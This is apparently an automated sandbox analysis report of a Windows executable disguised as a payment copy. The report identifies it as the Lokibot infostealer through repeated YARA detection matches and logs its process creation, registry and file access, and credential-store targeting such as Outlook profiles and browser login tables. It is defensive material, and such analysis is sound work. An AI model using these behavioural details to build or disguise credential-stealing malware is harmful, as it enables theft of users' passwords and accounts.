Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: wcycejenv.exe PID: 5332, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment_copy28476450.exe

Executable has a suspicious name (potential lure to open the executable)

Source: Payment_copy28476450.exe

Static file information: Suspicious name

Source: Payment_copy28476450.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 3.0.wcycejenv.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wcycejenv.exe PID: 5332, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040324F

Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Code function: 0_2_00406333	0_2_00406333
Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Code function: 0_2_00404936	0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004064B0	1_2_004064B0
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00420069	1_2_00420069
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004420D3	1_2_004420D3
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004202DD	1_2_004202DD
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00420542	1_2_00420542
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0043A760	1_2_0043A760
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004027E0	1_2_004027E0
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004207A7	1_2_004207A7
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00420A1B	1_2_00420A1B
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0043AC80	1_2_0043AC80
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0040CD62	1_2_0040CD62
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0043B0B0	1_2_0043B0B0
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0041F0BA	1_2_0041F0BA
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0040B201	1_2_0040B201
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0041F2EC	1_2_0041F2EC
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00439397	1_2_00439397
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0041F52D	1_2_0041F52D
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0041F75F	1_2_0041F75F
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0043B776	1_2_0043B776
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0041F991	1_2_0041F991
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00443AF2	1_2_00443AF2
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0041FBD2	1_2_0041FBD2
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00435BDC	1_2_00435BDC
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0041FE04	1_2_0041FE04
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00441FB3	1_2_00441FB3
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 3_2_0040549C	3_2_0040549C
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 3_2_004029D4	3_2_004029D4

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: String function: 00408200 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: String function: 0042C7E5 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: String function: 004338DF appears 33 times

Source: Payment_copy28476450.exe	ReversingLabs: Detection: 35%
Source: Payment_copy28476450.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

File read: C:\Users\user\Desktop\Payment_copy28476450.exe

Jump to behavior

Source: Payment_copy28476450.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Payment_copy28476450.exe C:\Users\user\Desktop\Payment_copy28476450.exe
Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Process created: C:\Users\user\AppData\Local\Temp\wcycejenv.exe "C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process created: C:\Users\user\AppData\Local\Temp\wcycejenv.exe "C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d
Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Process created: C:\Users\user\AppData\Local\Temp\wcycejenv.exe "C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process created: C:\Users\user\AppData\Local\Temp\wcycejenv.exe "C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d	Jump to behavior

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

3_2_0040650A

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

File created: C:\Users\user\AppData\Local\Temp\nsg6B4C.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/7@55/2

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004043F5

Source: wcycejenv.exe, 00000003.00000003.255548634.0000000002247000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Code function: 1_2_00404110 FormatMessageW,GetLastError,GetLastError,GetStdHandle,LocalFree,

1_2_00404110

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:584:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: wcycejenv.exe, 00000001.00000003.254413056.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, wcycejenv.exe, 00000001.00000003.252943268.0000000002630000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wcycejenv.exe, 00000001.00000003.254413056.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, wcycejenv.exe, 00000001.00000003.252943268.0000000002630000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE
